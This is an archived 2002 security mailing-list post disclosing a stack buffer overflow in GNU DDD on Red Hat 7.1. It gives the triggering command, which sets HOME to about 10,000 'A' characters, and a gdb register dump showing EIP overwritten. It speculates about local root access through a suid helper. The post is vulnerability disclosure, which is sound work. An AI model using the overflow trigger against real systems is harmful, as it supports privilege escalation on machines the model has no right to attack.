ddd smashed

From: l0rt (simonat_private)
Date: Tue Jan 15 2002 - 12:28:21 PST

Next message: l0rt: "Evolution Cores (needs more work)"

Previous message: s1gnal_9 : "Bugs? in Microsoft RDP protocol, & Questions. UPDATE"
Next in thread: Pavel Kankovsky: "Re: ddd smashed"
Reply: Pavel Kankovsky: "Re: ddd smashed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Werd...
========================================================================
Program  : ddd
OS       : Linux
DISTRO   : RedHat 7.1
Issue    : 0x41414141 (no core tho)
Home Page: http://www.gnu.org/software/ddd/
suid     : No
sgid     : No
Issue    : ddd may be called by an suid helper binary and could be 	  
exploited to gain local root access.

GNU DDD, the Data Display Debugger, is a GUI to command-line debuggers
like GDB, DBX, JDB, XDB, Ladebug, WDB, the Perl debugger, or the Python
debugger. It provides a graphical data display where complex data
structures can be explored incrementally and interactively.
========================================================================

Normally I use gdb to debug cores but today I decided to try ddd and my
efforts failed.  When I set the $HOME in my test account to 10235 A's
and I tried to run ddd like (I found an evolution core that will be
explained in my next post):


sh-2.04$ export HOME=`perl -e'print "A" x 10235'`
sh-2.04$ ddd /usr/bin/evolution

I get a bunch of A's that spew to my console and then some memory access
errors as seen below:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.... blah blah...
/.ddd/themes/" failed: File name too long
/tmp/dddNhatCp:3: Error in sourced command file:
Cannot access memory at address 0x41414141
<ctrl-c>

So... in light of this... I decided to use gdb to debug ddd which uses
gdb.. heh...  


Here is a dump of the registers...


eax            0x8572ec4        139931332
ecx            0x0      0
edx            0xbfffbc20       -1073759200
ebx            0x41414141       1094795585
esp            0xbfffbc20       0xbfffbc20
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
eflags         0x10246  66118
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
fctrl          0x37f    895
fstat          0x120    288
ftag           0xffff   65535
fiseg          0x23     35
fioff          0x400bf242       1074524738
foseg          0x2b     43
fooff          0xbfffac86       -1073763194
fop            0x6a     106


smashed ;o)


-- 

-l0rt-
	
	Secure Network Operations
	Strategic Reconnaissance Team
	Team Key ID: ACFCBD01
	l0rt Key ID: 47BF3F87
	------------------------------------------
	"That secret you've been guarding, isn't."

application/pgp-signature attachment: stored

Next message: l0rt: "Evolution Cores (needs more work)"
Previous message: s1gnal_9 : "Bugs? in Microsoft RDP protocol, & Questions. UPDATE"
Next in thread: Pavel Kankovsky: "Re: ddd smashed"
Reply: Pavel Kankovsky: "Re: ddd smashed"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jan 15 2002 - 12:58:37 PST